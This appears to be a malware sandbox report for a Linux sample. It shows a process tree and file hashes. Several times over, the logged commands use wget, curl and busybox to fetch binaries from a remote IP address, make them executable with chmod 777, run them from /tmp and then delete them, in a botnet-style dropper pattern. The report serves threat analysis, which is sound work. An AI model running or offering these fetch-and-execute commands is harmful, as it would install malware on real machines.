/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:1651
-
-
/bin/chmodchmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- File and Directory Permissions Modification
PID:1652
-
-
/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵
- Executes dropped EXE
PID:1653
-
-
/bin/rmrm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX72⤵PID:1654
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:1655
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Writes file to tmp directory
PID:1656
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:1657
-
-
/bin/chmodchmod 777 tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- File and Directory Permissions Modification
PID:1658
-
-
/tmp/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8./tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵
- Executes dropped EXE
PID:1659
-
-
/bin/rmrm tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF82⤵PID:1660
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:1661
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Writes file to tmp directory
PID:1662
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:1663
-
-
/bin/chmodchmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- File and Directory Permissions Modification
PID:1664
-
-
/tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵
- Executes dropped EXE
PID:1665
-
-
/bin/rmrm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F2⤵PID:1666
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:1667
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Writes file to tmp directory
PID:1668
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:1669
-
-
/bin/chmodchmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- File and Directory Permissions Modification
PID:1670
-
-
/tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵
- Executes dropped EXE
PID:1671
-
-
/bin/rmrm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp2⤵PID:1672
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:1673
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Writes file to tmp directory
PID:1674
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:1675
-
-
/bin/chmodchmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c22⤵PID:1678
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1679
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Writes file to tmp directory
PID:1680
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1681
-
-
/bin/chmodchmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- File and Directory Permissions Modification
PID:1682
-
-
/tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵
- Executes dropped EXE
PID:1683
-
-
/bin/rmrm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb32⤵PID:1684
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97